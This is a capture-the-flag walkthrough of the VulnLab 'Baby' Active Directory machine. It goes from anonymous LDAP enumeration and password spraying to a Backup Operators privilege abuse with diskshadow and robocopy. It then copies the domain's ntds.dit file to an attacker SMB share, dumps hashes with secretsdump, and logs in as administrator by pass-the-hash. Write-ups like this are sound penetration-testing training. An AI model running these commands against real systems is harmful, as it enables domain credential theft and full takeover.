BABY – VULNLAB

This is the Write-up/Walkthrough of the BABY Machine from VULNLAB.

NMAP SCAN:

53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 06:36:42Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-12T06:36:52+00:00
|_ssl-date: 2023-08-12T06:37:31+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl

Domain: baby.vl, BIOS Name: BabyDC

Looking for smb, tried connecting to it as anonymous, but it was not allowed, looking forward, i used ldapsearch to enumerate the domain with blank credentials.

ldapsearch -H ldap://10.10.92.79 -D '' -w '' -b "DC=baby,DC=vl"

Looking for the output result, found the password for user teresa.bell on Description flag.

after, that extracted all usernames, using grep for “dn”, and remove extra usernames which is not useful and make username like, if name is “John Doe” then add . between first and last name and remove the extra space, e.g: john.doe

cat ldap_search | grep dn | grep -o 'CN=[^,]*'

after that used crackmapexec, to brute the usernames using the found password.

crackmapexec smb 10.10.92.79 -u usernames.txt -p 'BabyStart123!'

didn’t found any valid user for founded credential but got to know that user caroline.robinson password must be change for smb, used smbpasswd command to change the password of caroline.robinson.

smbpasswd -r 10.10.92.79 -U caroline.robinson

Enter founded password on Old SMB password and set the new password for user caroline.robinson.

after that, used evil-winrm to connect to caroline.robinson and got the user flag.

evil-winrm -u caroline.robinson -p 'hacker@123' -i 10.10.92.79

found that user caroline.robinson is in Backup Operators group, which means user can backup and restore and files on the system.

net user caroline.robinson /domain
whoami /all
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Creating Distributed Shell file and adding commands which will be used by diskshadow.

set context persistent nowriters
add volume c: alias kunal
create
expose %kunal% z:
unix2dos kunal.dsh

then upload the file using evil-winrm download functionality, and used diskshadow command to create a copy of C drive to new drive named Z:

diskshadow /s kunal.dsh

diskshadow command successfully copied the C: drive to Z: drive.

robocopy /B Z:\Windows\NTDS . ntds.dit

after that, tried to download ntds.dit file using download funcationality of winrm, but it was failing, so i started the smbserver using impacket-smbserver and copied the ntds.dit to my linux machine.

Starting the smb server on linux.

impacket-smbserver -smb2support share.

copying the ntds.dit file.

copy ntds.dit \\YOUR-TUNNEL-IP\share\ntds.dit

after that used secretsdump from impacket to dump the hashes from ntds.dit and system.hive, to dump the system file from registry.

reg save hklm\system system.hive

Downloaded the system.hive also to linux machine.

impacket-secretsdump -ntds ntds.dit -system system.hive local

after getting the hash of administrator, used evil-winrm to connect to administrator account using pass the hash method.

evil-winrm -u administrator -H ee4457ae59f1e3fbd764e33d9cef123d -i 10.10.88.6

If you face any problems, let me know in the comment.

Leave a Reply

Your email address will not be published. Required fields are marked *